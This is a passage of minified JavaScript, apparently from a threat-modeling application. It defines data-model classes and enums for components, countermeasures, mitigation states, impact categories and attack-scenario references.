n=0;n<16;++n)a[e+n]=i[n];return a}return function CG(t,a=0){return(sc[t[a+0]]+sc[t[a+1]]+sc[t[a+2]]+sc[t[a+3]]+"-"+sc[t[a+4]]+sc[t[a+5]]+"-"+sc[t[a+6]]+sc[t[a+7]]+"-"+sc[t[a+8]]+sc[t[a+9]]+"-"+sc[t[a+10]]+sc[t[a+11]]+sc[t[a+12]]+sc[t[a+13]]+sc[t[a+14]]+sc[t[a+15]]).toLowerCase()}(i)};var Ja=(()=>{return(t=Ja||(Ja={}))[t.Added=1]="Added",t[t.Changed=2]="Changed",t[t.Removed=3]="Removed",Ja;var t})(),Ii=(()=>{return(t=Ii||(Ii={})).ArrowPosition="Arrow Position",t.AssignNumberToAsset="Assign Number To Asset",t.CheckBox="Check Box",t.DevInterfaceName="Device Interface Name",t.DataFlowChangeDirection="Data Flow Change Direction",t.DataFlowDiagramReference="Data Flow Diagram Reference",t.DiagramReference="Diagram Reference",t.ElementName="Element Name",t.FlowType="Flow Type",t.ImpactCategory="Impact Category",t.InterfaceElementSelect="Interface Element Select",t.LineType="Line Type",t.LowMediumHighSelect="Low Medium High Select",t.MyDataSelect="Data Select",t.PhysicalElementSelect="Physical Element Select",t.PortBox="Port Box",t.ProtocolSelect="Protocol Select",t.OpenNotes="Open Notes",t.OpenQuestionnaire="Open Questionnaire",t.StencilType="Stencil Type",t.TextArea="Text Area",t.TextBox="Text Box",t.TextBoxValidator="Text Box Validator",Ii;var t})();class yG{static GetTypeNames(){return Object.keys(Ii).map(a=>Ii[a]).filter(a=>"string"==typeof a)}static GetMappableTypeNames(){return[Ii.CheckBox,Ii.DiagramReference,Ii.LowMediumHighSelect,Ii.MyDataSelect,Ii.PhysicalElementSelect,Ii.StencilType,Ii.TextArea,Ii.TextBox]}}var li=(()=>{return(t=li||(li={}))[t.DeleteElementReferences=0]="DeleteElementReferences",t[t.MoveChildElements=1]="MoveChildElements",t[t.RemovePhysicalElementReference=2]="RemovePhysicalElementReference",t[t.DeleteDataFlow=3]="DeleteDataFlow",t[t.RemoveInterfaceReference=4]="RemoveInterfaceReference",t[t.DeleteAttackScenario=5]="DeleteAttackScenario",t[t.RemoveElementFromAttackScenario=6]="RemoveElementFromAttackScenario",t[t.RemoveElementFromTestCase=7]="RemoveElementFromTestCase",t[t.DeleteContextFlow=8]="DeleteContextFlow",t[t.ResetStencilType=9]="ResetStencilType",t[t.DeleteDFDElement=10]="DeleteDFDElement",t[t.DeleteThreatRule=11]="DeleteThreatRule",t[t.DeleteThreatRuleGroup=12]="DeleteThreatRuleGroup",t[t.DeleteThreatQuestion=13]="DeleteThreatQuestion",t[t.DeleteMyComponentType=14]="DeleteMyComponentType",t[t.DeleteComponent=15]="DeleteComponent",t[t.DeleteThreatCategory=16]="DeleteThreatCategory",t[t.DeleteAttackVector=17]="DeleteAttackVector",t[t.DeleteAttackVectorGroup=18]="DeleteAttackVectorGroup",t[t.RemoveStencilTypeTemplateFromStencilType=19]="RemoveStencilTypeTemplateFromStencilType",t[t.RemoveFromStencilProtocolStack=20]="RemoveFromStencilProtocolStack",t[t.RemoveFromElementProtocolStack=21]="RemoveFromElementProtocolStack",t[t.RemoveThreatCategoryFromAttackVector=22]="RemoveThreatCategoryFromAttackVector",t[t.RemoveThreatCategoryFromThreatRule=23]="RemoveThreatCategoryFromThreatRule",t[t.RemoveThreatCategoryFromAttackScenario=24]="RemoveThreatCategoryFromAttackScenario",t[t.RemoveThreatCategoryFromThreatMnemonic=25]="RemoveThreatCategoryFromThreatMnemonic",t[t.RemoveThreatQuestionFromComponent=26]="RemoveThreatQuestionFromComponent",t[t.RemoveAttackVectorFromControl=27]="RemoveAttackVectorFromControl",t[t.RemoveSystemThreatFromAttackScenario=28]="RemoveSystemThreatFromAttackScenario",t[t.DeleteDiagram=29]="DeleteDiagram",t[t.DeleteStack=30]="DeleteStack",t[t.DeleteMyData=31]="DeleteMyData",t[t.DeleteAssetGroup=32]="DeleteAssetGroup",t[t.DeleteControl=33]="DeleteControl",t[t.DeleteControlGroup=34]="DeleteControlGroup",t[t.DeleteCountermeasure=35]="DeleteCountermeasure",t[t.RemoveElementFromCountermeasure=36]="RemoveElementFromCountermeasure",t[t.RemoveAttackScenarioFromCountermeasure=37]="RemoveAttackScenarioFromCountermeasure",t[t.RemoveAttackScenarioFromAttackScenario=38]="RemoveAttackScenarioFromAttackScenario",t[t.RemoveAttackScenarioFromTestCase=39]="RemoveAttackScenarioFromTestCase",t[t.RemoveCountermeasureFromTestCase=40]="RemoveCountermeasureFromTestCase",t[t.RemoveMitigationProcessFromCountermeasure=41]="RemoveMitigationProcessFromCountermeasure",t[t.DeleteRequirementType=42]="DeleteRequirementType",t[t.RemoveRequirementTypeFromChecklistType=43]="RemoveRequirementTypeFromChecklistType",t[t.RemoveRequirementTypeFromChecklist=44]="RemoveRequirementTypeFromChecklist",t[t.DeleteChecklist=45]="DeleteChecklist",t[t.DeleteTestCase=46]="DeleteTestCase",t[t.RemoveMyTagFromAttackScenario=47]="RemoveMyTagFromAttackScenario",t[t.RemoveMyTagFromCountermeasure=48]="RemoveMyTagFromCountermeasure",t[t.RemoveMyTagFromMyTagChart=49]="RemoveMyTagFromMyTagChart",li;var t})();class bG{static ToString(a,e,i){var n,r,c;return a.Type===li.DeleteElementReferences?i.instant("dialog.delete.DeleteElementReferences")+" "+(null===(r=e.Project.FindDiagramOfElement(null===(n=a.Param)||void 0===n?void 0:n.ID))||void 0===r?void 0:r.Name):i.instant("dialog.delete."+li[a.Type])+" "+(null===(c=a.Param)||void 0===c?void 0:c.Name)}static FindAllReferencesDeep(a,e,i){let n=[];a.FindReferences(e,i).forEach(c=>{n.push(c),li[c.Type].startsWith("Delete")&&n.push(...this.FindAllReferencesDeep(c.Param,e,i))});let r=[];for(let c=1;cT.Type==n[c].Type&&T.Param==n[c].Param);d>=0&&d{n.splice(c,1)}),n}}class Ln{constructor(a){this.properties=[],this.NameChanged=new Tt,this.DataChanged=new Tt,this.Data=a,0==Object.keys(a).length&&(this.Data.ID=Fo(),this.Name="",this.Description=""),this.initProperties()}get ID(){return this.Data.ID}get Name(){return this.Data.Name.replace(/\n/g," ")}set Name(a){this.Data.Name=a,this.NameChanged.emit(a)}get NameRaw(){return this.Data.Name}set NameRaw(a){this.Name=a}get Description(){return this.Data.Description}set Description(a){this.Data.Description=a}GetProperties(){return this.properties}AddProperty(a,e,i,n,r,c,d,T){let k=this.properties.find(Y=>Y.ID==e&&Y.Type==r&&Y.Editable==c);if(k)return k;let q={DisplayName:a,ID:e,Tooltip:i,HasGetter:n,Type:r,Editable:c,Callback:T};return d&&(q.DefaultValue=d),this.properties.push(q),q}GetProperty(a){let e=this.properties.find(i=>i.ID==a);return e?e.HasGetter?this[e.ID]:this.Data[e.ID]:null}SetProperty(a,e){let i=this.properties.find(n=>n.ID==a);!i||(i.HasGetter?this[i.ID]=e:this.Data[i.ID]=e)}CopyFrom(a){const e=this.ID;this.Data=JSON.parse(JSON.stringify(a)),this.Data.ID=e}ToJSON(){return this.Data}initProperties(){this.AddProperty("properties.Name","Name","",!0,Ii.TextBox,!0),this.AddProperty("properties.Description","Description","",!0,Ii.TextArea,!0)}}class Np extends Ln{constructor(a){super(a),this.OutOfScopeChanged=new Tt,this.Data.UserCheckedElement||(this.Data.UserCheckedElement=!1),this.InitSubsriptions()}get UserCheckedElement(){return this.Data.UserCheckedElement}set UserCheckedElement(a){this.Data.UserCheckedElement=a}get OutOfScope(){return this.Data.OutOfScope}set OutOfScope(a){this.Data.OutOfScope=a,this.OutOfScopeChanged.emit(a)}initProperties(){super.initProperties(),this.GetProperties().find(a=>"Name"==a.ID).Type=Ii.TextArea,this.AddProperty("properties.OutOfScope","OutOfScope","",!0,Ii.CheckBox,!0,!1)}InitSubsriptions(){this.UserCheckedElement||setTimeout(()=>{this.subscription=this.NameChanged.subscribe(()=>{this.UserCheckedElement=!0,this.subscription.unsubscribe()})},1e3)}FindReferences(a,e){let i=[];return null==a||a.GetAttackScenarios().filter(n=>{var r;return n.Target==this||(null===(r=n.Targets)||void 0===r?void 0:r.includes(this))}).forEach(n=>{i.push(n.ThreatRule&&2==n.ThreatRule.RuleGenerationType&&null==n.Target?{Type:li.RemoveElementFromAttackScenario,Param:n}:{Type:li.DeleteAttackScenario,Param:n})}),null==a||a.GetCountermeasures().filter(n=>n.Targets.includes(this)).forEach(n=>i.push({Type:li.RemoveElementFromCountermeasure,Param:n})),null==a||a.GetTestCases().filter(n=>n.LinkedElements.includes(this)).forEach(n=>i.push({Type:li.RemoveElementFromTestCase,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteAttackScenario?a.DeleteAttackScenario(n.Param):n.Type==li.RemoveElementFromAttackScenario?n.Param.Targets=n.Param.Targets.filter(r=>r!=this):n.Type==li.RemoveElementFromCountermeasure?n.Param.RemoveTarget(this.ID):n.Type==li.RemoveCountermeasureFromTestCase&&n.Param.RemoveLinkedElement(this.ID)})}}var zr=(()=>{return(t=zr||(zr={}))[t.None=0]="None",t[t.Software=1]="Software",t[t.Process=2]="Process",zr;var t})();class Kb extends Ln{constructor(a,e){super(a),this.config=e,this.Properties||(this.Properties=[])}get ComponentTypeID(){return this.Data.ComponentTypeID}set ComponentTypeID(a){this.Data.ComponentTypeID=a}get IsActive(){return this.Data.IsActive}set IsActive(a){this.Data.IsActive=a}get IsThirdParty(){return this.Data.IsThirdParty}set IsThirdParty(a){this.Data.IsThirdParty=a}get Properties(){return this.Data.Properties}set Properties(a){this.Data.Properties=a}FindReferences(a,e){let i=[];return e.GetThreatQuestions().filter(n=>n.ComponentType.ID==this.ID).forEach(n=>i.push({Type:li.DeleteThreatQuestion,Param:n})),null==a||a.GetComponents().filter(n=>n.Type.ID==this.ID).forEach(n=>i.push({Type:li.DeleteComponent,Param:n})),i}OnDelete(a,e){let i=this.FindReferences(a,e),n=e.FindGroupOfMyComponent(this);n&&n.RemoveMyComponentType(this),i.forEach(r=>{r.Type==li.DeleteThreatQuestion?e.DeleteThreatQuestion(r.Param):r.Type==li.DeleteComponent&&a.DeleteComponent(r.Param)})}static FromJSON(a,e){return new Kb(a,e)}}class Xb extends Ln{constructor(a,e){super(a),this.config=e,this.Data.myComponentTypeIDs||(this.Data.myComponentTypeIDs=[])}get Types(){let a=[];return this.Data.myComponentTypeIDs.forEach(e=>a.push(this.config.GetMyComponentType(e))),a}get ComponentTypeID(){return this.Data.ComponentTypeID}set ComponentTypeID(a){this.Data.ComponentTypeID=a}AddMyComponentType(a){this.Types.includes(a)||this.Data.myComponentTypeIDs.push(a.ID)}RemoveMyComponentType(a){this.Types.includes(a)&&this.Data.myComponentTypeIDs.splice(this.Data.myComponentTypeIDs.indexOf(a.ID),1)}FindReferences(a,e){let i=[];return this.Types.forEach(n=>i.push({Type:li.DeleteMyComponentType,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteMyComponentType&&e.DeleteMyComponentType(n.Param)})}static FromJSON(a,e){return new Xb(a,e)}}class rf extends Np{constructor(a,e,i,n){super(a),this.project=i,this.config=n,this.Type||(this.Name=e.Name,this.IsActive=e.IsActive,this.IsThirdParty=e.IsThirdParty,this.Description=e.Description),this.Type=e,this.Data.threatQuestions||(this.Data.threatQuestions={}),this.Data.Notes||(this.Data.Notes=[]),this.Data.notesPerQuestion||(this.Data.notesPerQuestion={}),this.Version||(this.Version=""),this.Port||(this.Port=""),n.GetThreatQuestions().filter(r=>r.ComponentType.ID==e.ID).forEach(r=>this.AddThreatQuestion(r))}get IsActive(){return this.Data.IsActive}set IsActive(a){this.Data.IsActive=a}get IsThirdParty(){return this.Data.IsThirdParty}set IsThirdParty(a){this.Data.IsThirdParty=a}get Type(){return this.config.GetMyComponentType(this.Data.typeID)}set Type(a){this.Data.typeID=a.ID,this.setTypeProperties(a),this.TypeID=a.ComponentTypeID,this.TypeID==zr.Software&&(this.AddProperty("properties.Version","Version","",!0,Ii.TextBox,!0),this.AddProperty("properties.Port","Port","",!0,Ii.PortBox,!0))}get TypeID(){return this.Data.TypeID}set TypeID(a){this.Data.TypeID=a}get ThreatQuestions(){return this.Data.threatQuestions}get Version(){return this.Data.Version}set Version(a){this.Data.Version=a}get Port(){return this.Data.Port}set Port(a){this.Data.Port=a}get Notes(){return this.Data.Notes}set Notes(a){this.Data.Notes=a}get NotesPerQuestion(){return this.Data.notesPerQuestion}set NotesPerQuestion(a){this.Data.notesPerQuestion=a}get SyncNameToTypeName(){return this.Data.SyncNameToTypeName}set SyncNameToTypeName(a){this.Data.SyncNameToTypeName=a}get Name(){return this.Data.Name.replace(/\n/g," ")}set Name(a){this.Data.Name=a,this.SyncNameToTypeName&&(this.Type.Name=a),this.NameChanged.emit(a)}AddThreatQuestion(a){a.ID in this.Data.threatQuestions||(this.Data.threatQuestions[a.ID]=null)}RemoveThreatQuestion(a){this.Data.threatQuestions[a.ID]&&delete this.Data.threatQuestions[a.ID]}FindReferences(a,e){return super.FindReferences(a,e)}OnDelete(a,e){super.OnDelete(a,e);let i=a.GetStacks().find(n=>n.GetChildren().includes(this));i&&i.RemoveChild(this)}static FromJSON(a,e,i){let n=i.GetMyComponentType(a.typeID);return null==n&&(n=i.CreateMyComponentType(i.GetMyComponentTypeGroups(a.TypeID)[0]),n.Name=a.Name=a.Name+" - ERROR - Missing type"),new rf(a,n,e,i)}initProperties(){super.initProperties(),this.AddProperty("properties.IsActive","IsActive","",!0,Ii.CheckBox,!0),this.AddProperty("properties.IsThirdParty","IsThirdParty","",!0,Ii.CheckBox,!0),this.TypeID==zr.Software&&(this.AddProperty("properties.Version","Version","",!0,Ii.TextBox,!0),this.AddProperty("properties.Port","Port","",!0,Ii.PortBox,!0)),this.AddProperty("properties.Questionnaire","","",!1,Ii.OpenQuestionnaire,!0),this.AddProperty("general.Notes","","",!1,Ii.OpenNotes,!0)}setTypeProperties(a){a&&a.Properties&&a.Properties.forEach(e=>{this.AddProperty(null==e.DisplayName?e.ID:e.DisplayName,e.ID,e.Tooltip,e.HasGetter,e.Type,e.Editable),null==this.Data[e.ID]&&(this.Data[e.ID]=e.DefaultValue)})}}class Om extends Ln{constructor(a,e,i){super(a),this.ChildrenChanged=new Tt,this.project=e,this.Data.childrenIDs||(this.Data.childrenIDs=[]),null==this.ComponentTypeID&&this.children.length>0&&(this.ComponentTypeID=this.children[0].Type.ComponentTypeID)}get children(){let a=[];return this.Data.childrenIDs.forEach(e=>a.push(this.project.GetComponent(e))),a}get ComponentTypeID(){return this.Data.ComponentTypeID}set ComponentTypeID(a){this.Data.ComponentTypeID=a}get Root(){return this.project.GetStack(this.Data.rootID)}set Root(a){this.Data.rootID=null==a?void 0:a.ID}AddChild(a){null!=a?this.Data.childrenIDs.includes(a.ID)||(this.Data.childrenIDs.push(a.ID),this.Root?this.Root.ChildrenChanged.emit(!0):this.ChildrenChanged.emit(!0)):console.error("child undefined")}RemoveChild(a){const e=this.Data.childrenIDs.indexOf(a.ID);return e>=0&&(this.Data.childrenIDs.splice(e,1),this.Root?this.Root.ChildrenChanged.emit(!1):this.ChildrenChanged.emit(!1)),e>=0}DeleteChild(a){const e=this.Data.childrenIDs.indexOf(a.ID);return e>=0&&(this.Data.childrenIDs.splice(e,1),this.project.DeleteComponent(a),this.Root?this.Root.ChildrenChanged.emit(!1):this.ChildrenChanged.emit(!1)),e>=0}GetChildren(){return this.children}GetChildrenFlat(){return this.GetChildren()}FindReferences(a,e){let i=[];return this.GetChildren().forEach(n=>i.push({Type:li.DeleteComponent,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteComponent&&a.DeleteComponent(n.Param)})}static FromJSON(a,e,i){return new Om(a,e,i)}}class Wg extends Ln{constructor(a,e){super(a),this.config=e,this.Data.mitigatedAttackVectorIDs||(this.Data.mitigatedAttackVectorIDs=[]),this.Data.mitigatedThreatRuleIDs||(this.Data.mitigatedThreatRuleIDs=[]),this.Data.MitigationTips||(this.Data.MitigationTips=[])}get MitigatedAttackVectors(){let a=[];return this.Data.mitigatedAttackVectorIDs.forEach(e=>a.push(this.config.GetAttackVector(e))),a}set MitigatedAttackVectors(a){this.Data.mitigatedAttackVectorIDs=null==a?void 0:a.map(e=>e.ID)}get MitigatedThreatRules(){let a=[];return this.Data.mitigatedThreatRuleIDs.forEach(e=>a.push(this.config.GetThreatRule(e))),a}set MitigatedThreatRules(a){this.Data.mitigatedThreatRuleIDs=null==a?void 0:a.map(e=>e.ID)}get MitigationTips(){return this.Data.MitigationTips}set MitigationTips(a){this.Data.MitigationTips=a}AddMitigatedAttackVector(a){this.MitigatedAttackVectors.includes(a)||this.Data.mitigatedAttackVectorIDs.push(a.ID)}RemoveMitigatedAttackVector(a){const e=this.MitigatedAttackVectors.indexOf(a);e>=0&&this.Data.mitigatedAttackVectorIDs.splice(e,1)}AddMitigatedThreatRule(a){this.MitigatedThreatRules.includes(a)||this.Data.mitigatedThreatRuleIDs.push(a.ID)}RemoveMitigatedThreatRule(a){const e=this.MitigatedThreatRules.indexOf(a);e>=0&&this.Data.mitigatedThreatRuleIDs.splice(e,1)}FindReferences(a,e){let i=[];return null==a||a.GetCountermeasures().filter(n=>n.Control==this).forEach(n=>i.push({Type:li.DeleteCountermeasure,Param:n})),i}OnDelete(a,e){let i=e.FindGroupOfControl(this);i&&i.RemoveControl(this),this.FindReferences(a,e).forEach(r=>{r.Type==li.DeleteCountermeasure&&a.DeleteCountermeasure(r.Param)})}static FromJSON(a,e){return new Wg(a,e)}}class Yb extends Ln{constructor(a,e){super(a),this.config=e,this.Data.controlGroupIDs||(this.Data.controlGroupIDs=[]),this.Data.controlIDs||(this.Data.controlIDs=[])}get SubGroups(){let a=[];return this.Data.controlGroupIDs.forEach(e=>a.push(this.config.GetControlGroup(e))),a}get Controls(){let a=[];return this.Data.controlIDs.forEach(e=>a.push(this.config.GetControl(e))),a}AddControlGroup(a){this.SubGroups.includes(a)||this.Data.controlGroupIDs.push(a.ID)}RemoveControlGroup(a){this.SubGroups.includes(a)&&this.Data.controlGroupIDs.splice(this.Data.controlGroupIDs.indexOf(a.ID),1)}AddControl(a){this.Controls.includes(a)||this.Data.controlIDs.push(a.ID)}RemoveControl(a){this.Controls.includes(a)&&this.Data.controlIDs.splice(this.Data.controlIDs.indexOf(a.ID),1)}FindReferences(a,e){let i=[];return this.SubGroups.forEach(n=>i.push({Type:li.DeleteControlGroup,Param:n})),this.Controls.forEach(n=>i.push({Type:li.DeleteControl,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteControl?e.DeleteControl(n.Param):n.Type==li.DeleteControlGroup&&e.DeleteControlGroup(n.Param)}),e.FindGroupOfControlGroup(this).RemoveControlGroup(this)}static FromJSON(a,e){return new Yb(a,e)}}var Ra=(()=>{return(t=Ra||(Ra={}))[t.NotSet=1]="NotSet",t[t.NotApplicable=2]="NotApplicable",t[t.Rejected=3]="Rejected",t[t.NeedsInvestigation=4]="NeedsInvestigation",t[t.MitigationStarted=5]="MitigationStarted",t[t.Implemented=6]="Implemented",t[t.Duplicate=7]="Duplicate",Ra;var t})();class Sl{static GetMitigationStates(){return[Ra.NotSet,Ra.NotApplicable,Ra.Rejected,Ra.NeedsInvestigation,Ra.MitigationStarted,Ra.Implemented,Ra.Duplicate]}static GetDashboardMitigationStates(){return[Ra.NotSet,Ra.NeedsInvestigation,Ra.MitigationStarted,Ra.Implemented]}static ToString(a){switch(a){case Ra.NotSet:return"properties.mitigationstate.NotSet";case Ra.NotApplicable:return"properties.mitigationstate.NotApplicable";case Ra.Rejected:return"properties.mitigationstate.Rejected";case Ra.NeedsInvestigation:return"properties.mitigationstate.NeedsInvestigation";case Ra.MitigationStarted:return"properties.mitigationstate.ImplementationStarted";case Ra.Implemented:return"properties.mitigationstate.Implemented";case Ra.Duplicate:return"properties.mitigationstate.Duplicate";default:return console.error("Missing State in MitigationStateUtil.ToString()",a),"Undefined"}}}class Jl extends Ln{constructor(a,e,i){super(a),this.project=e,this.config=i,this.Data.attackScenarioIDs||(this.Data.attackScenarioIDs=[]),this.Data.MitigationState||(this.MitigationState=Ra.NotSet),this.Data.myTagIDs||(this.Data.myTagIDs=[])}get Name(){if(null!=this.Data.Name)return this.Data.Name;let a="";return this.Control&&(a+=this.Control.Name+" for "),this.Targets&&(a+=this.Targets.filter(e=>e).map(e=>e.GetProperty("Name")).join(", ")),a}set Name(a){this.Data.Name=a,this.NameChanged.emit(this.Name)}get Number(){return this.Data.Number}set Number(a){this.Data.Number=a&&String(a)}get ViewID(){return this.Data.ViewID}set ViewID(a){this.Data.ViewID=a}get MappingState(){return this.Data.MappingState}set MappingState(a){this.Data.MappingState=a}get MitigationState(){return this.Data.MitigationState}set MitigationState(a){this.Data.MitigationState=Number(a)}get IsGenerated(){return this.Data.IsGenerated}set IsGenerated(a){this.Data.IsGenerated=a}get RuleStillApplies(){return this.Data.RuleStillApplies}set RuleStillApplies(a){this.Data.RuleStillApplies=a}get Control(){return this.config.GetControl(this.Data.controlID)}set Control(a){this.Data.controlID=null==a?void 0:a.ID}get Targets(){let a=[];return this.Data.targetIDs.forEach(e=>{let i=this.project.GetDFDElement(e);if(i)a.push(i);else{let n=this.project.GetComponent(e);if(n)a.push(n);else{let r=this.project.GetContextElement(e);a.push(r||null)}}}),a}set Targets(a){this.Data.targetIDs=a.map(e=>e.ID)}get AttackScenarios(){let a=[];return this.Data.attackScenarioIDs.forEach(e=>a.push(this.project.GetAttackScenario(e))),a}set AttackScenarios(a){this.Data.attackScenarioIDs=null==a?void 0:a.map(e=>e.ID)}get MitigationProcess(){return this.project.GetMitigationProcess(this.Data.mitigationProcessID)}set MitigationProcess(a){this.Data.mitigationProcessID=null==a?void 0:a.ID}get AttackVectors(){var a;return null===(a=this.AttackScenarios)||void 0===a?void 0:a.map(e=>null==e?void 0:e.AttackVector).filter(e=>e).filter((e,i,n)=>n.indexOf(e)===i)}get MyTags(){let a=[];return this.Data.myTagIDs.forEach(e=>a.push(this.project.GetMyTag(e))),a}set MyTags(a){this.Data.myTagIDs=null==a?void 0:a.map(e=>e.ID)}SetMapping(a,e,i){this.MappingState=zn.New,this.Control=a,this.Targets=e,this.AttackScenarios=i,this.Name=null,this.RuleStillApplies=!0}AddAttackScenario(a){this.AttackScenarios.includes(a)||this.Data.attackScenarioIDs.push(a.ID)}RemoveAttackScenario(a){const e=this.Data.attackScenarioIDs.indexOf(a);e>=0&&this.Data.attackScenarioIDs.splice(e,1)}AddTarget(a){this.Targets.includes(a)||this.Data.targetIDs.push(a.ID)}RemoveTarget(a){const e=this.Data.targetIDs.indexOf(a);e>=0&&this.Data.targetIDs.splice(e,1)}AddMyTag(a){this.MyTags.includes(a)||this.Data.myTagIDs.push(a.ID)}RemoveMyTag(a){const e=this.Data.myTagIDs.indexOf(a);e>=0&&this.Data.myTagIDs.splice(e,1)}GetDiagram(){return this.project.GetView(this.ViewID)}GetTestCases(){return this.project.GetTestCases().filter(a=>a.LinkedMeasures.includes(this))}CheckUniqueNumber(){return this.project.GetCountermeasures().some(a=>a.Number==this.Number&&a.ID!=this.ID)}GetLongName(){var a;return"CM"+Gi.EmptyIfNull(this.Number)+") "+this.Name+" ("+(null===(a=this.Targets)||void 0===a?void 0:a.map(e=>e.Name).join(", "))+")"}CleanUpReferences(){let a=this.AttackScenarios;for(let i=a.length-1;i>=0;i--)null==a[i]&&this.Data.attackScenarioIDs.splice(i,1);let e=this.Targets;for(let i=e.length-1;i>=0;i--)null==e[i]&&this.Data.targetIDs.splice(i,1)}FindReferences(a,e){let i=[];return null==a||a.GetTestCases().filter(n=>n.LinkedMeasures.includes(this)).forEach(n=>i.push({Type:li.RemoveCountermeasureFromTestCase,Param:n})),i}OnDelete(a,e){this.MappingState=zn.Removed,this.FindReferences(a,e).forEach(n=>{n.Type==li.RemoveCountermeasureFromTestCase&&n.Param.RemoveLinkedCountermeasure(this.ID)})}static FromJSON(a,e,i){return new Jl(a,e,i)}}var kl=(()=>{return(t=kl||(kl={}))[t.NotStarted=1]="NotStarted",t[t.WorkInProgress=2]="WorkInProgress",t[t.Completed=3]="Completed",kl;var t})();class C2{static GetMitigationStates(){return[kl.NotStarted,kl.WorkInProgress,kl.Completed]}static ToString(a){switch(a){case kl.NotStarted:return"properties.mitigationprocessstate.NotStarted";case kl.WorkInProgress:return"properties.mitigationprocessstate.WorkInProgress";case kl.Completed:return"properties.mitigationprocessstate.Completed";default:return console.error("Missing State in MitigationProcessStateUtil.ToString()",a),"Undefined"}}}class Lp extends Ln{constructor(a,e,i){super(a),this.project=e,this.config=i,this.MitigationProcessState||(this.MitigationProcessState=kl.NotStarted),null==this.Progress&&(this.Progress=0),this.Data.Tasks||(this.Data.Tasks=[]),this.Data.Notes||(this.Data.Notes=[])}get Number(){return this.Data.Number}set Number(a){this.Data.Number=a&&String(a)}get Progress(){return this.Data.Progress}set Progress(a){this.Data.Progress=a}get Tasks(){return this.Data.Tasks}set Tasks(a){this.Data.Tasks=a}get Notes(){return this.Data.Notes}set Notes(a){this.Data.Notes=a}get MitigationProcessState(){return this.Data.MitigationProcessState}set MitigationProcessState(a){this.Data.MitigationProcessState=a}get Countermeasures(){return this.project.GetCountermeasures().filter(a=>a.MitigationProcess==this)}set Countermeasures(a){this.Countermeasures.filter(e=>!a.includes(e)).forEach(e=>e.MitigationProcess=null),a.forEach(e=>e.MitigationProcess=this)}CheckUniqueNumber(){return this.project.GetMitigationProcesses().some(a=>a.Number==this.Number&&a.ID!=this.ID)}GetLongName(){return"MP"+Gi.EmptyIfNull(this.Number)+") "+this.Name}FindReferences(a,e){let i=[];return this.Countermeasures.forEach(n=>i.push({Type:li.RemoveMitigationProcessFromCountermeasure,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.RemoveMitigationProcessFromCountermeasure&&(n.Param.MitigationProcess=null)})}static FromJSON(a,e,i){return new Lp(a,e,i)}}var so=(()=>{return(t=so||(so={}))[t.Confidentiality=1]="Confidentiality",t[t.Integrity=2]="Integrity",t[t.Availability=3]="Availability",t[t.Authorization=4]="Authorization",t[t.Authenticity=5]="Authenticity",t[t.NonRepudiation=6]="NonRepudiation",t[t.Auditability=7]="Auditability",t[t.Trustworthiness=8]="Trustworthiness",t[t.Safety=9]="Safety",t[t.Privacy=10]="Privacy",t[t.Compliance=11]="Compliance",t[t.Financial=12]="Financial",t[t.Reputation=13]="Reputation",t[t.CustomerSatisfaction=14]="CustomerSatisfaction",t[t.ProductionProcess=15]="ProductionProcess",so;var t})();class Vs{static GetKeys(){return[so.Confidentiality,so.Integrity,so.Availability,so.Authorization,so.Authenticity,so.NonRepudiation,so.Auditability,so.Trustworthiness,so.Safety,so.Privacy,so.Compliance,so.Financial,so.Reputation,so.CustomerSatisfaction,so.ProductionProcess]}static ToString(a){switch(a){case so.Confidentiality:return"impactcategory.Confidentiality";case so.Integrity:return"impactcategory.Integrity";case so.Availability:return"impactcategory.Availability";case so.Authorization:return"impactcategory.Authorization";case so.Authenticity:return"impactcategory.Authenticity";case so.NonRepudiation:return"impactcategory.NonRepudiation";case so.Auditability:return"impactcategory.Auditability";case so.Trustworthiness:return"impactcategory.Trustworthiness";case so.Safety:return"impactcategory.Safety";case so.Privacy:return"impactcategory.Privacy";case so.Compliance:return"impactcategory.Compliance";case so.Financial:return"impactcategory.Financial";case so.Reputation:return"impactcategory.Reputation";case so.CustomerSatisfaction:return"impactcategory.CustomerSatisfaction";case so.ProductionProcess:return"impactcategory.ProductionProcess";default:return console.error("Missing Cat in ImpactCategoryUtil.ToString()",a),"Undefined"}}}class Jb extends Ln{get ImpactCats(){return this.Data.ImpactCats}constructor(a,e){super(a),this.ImpactCats||(this.Data.ImpactCats=[])}FindReferences(a,e){let i=[];return e.GetAttackVectors().filter(n=>{var r;return null===(r=n.ThreatCategories)||void 0===r?void 0:r.includes(this)}).forEach(n=>{i.push({Type:li.RemoveThreatCategoryFromAttackVector,Param:n})}),e.GetThreatRules().filter(n=>{var r;return null===(r=n.ThreatCategories)||void 0===r?void 0:r.includes(this)}).forEach(n=>{i.push({Type:li.RemoveThreatCategoryFromThreatRule,Param:n})}),e.GetStencilThreatMnemonics().filter(n=>n.Letters.some(r=>r.threatCategoryID==this.ID)).forEach(n=>{i.push({Type:li.RemoveThreatCategoryFromThreatMnemonic,Param:n})}),null==a||a.GetAttackScenarios().filter(n=>{var r;return null===(r=n.ThreatCategories)||void 0===r?void 0:r.includes(this)}).forEach(n=>{i.push({Type:li.RemoveThreatCategoryFromAttackScenario,Param:n})}),i}OnDelete(a,e){let i=this.FindReferences(a,e),n=e.FindGroupOfThreatCategory(this);n&&n.RemoveThreatCategory(this),i.forEach(r=>{if(r.Type==li.RemoveThreatCategoryFromAttackScenario){let c=r.Param.Mapping.Threat.ThreatCategoryIDs;c.splice(c.indexOf(r.Param.ID),1)}else if(r.Type==li.RemoveThreatCategoryFromAttackVector){let c=r.Param.Data.threatCategorieIDs;c.splice(c.indexOf(r.Param.ID),1)}else if(r.Type==li.RemoveThreatCategoryFromThreatRule){let c=r.Param.Mapping.ThreatCategoryIDs;c.splice(c.indexOf(r.Param.ID),1)}else r.Type==li.RemoveThreatCategoryFromThreatMnemonic&&r.Param.Letters.forEach(c=>{c.threatCategoryID==this.ID&&(c.threatCategoryID=null)})})}static FromJSON(a,e){return new Jb(a,e)}}class Zb extends Ln{constructor(a,e){super(a),this.config=e,this.Data.threatCategorieIDs||(this.Data.threatCategorieIDs=[])}get ThreatCategories(){let a=[];return 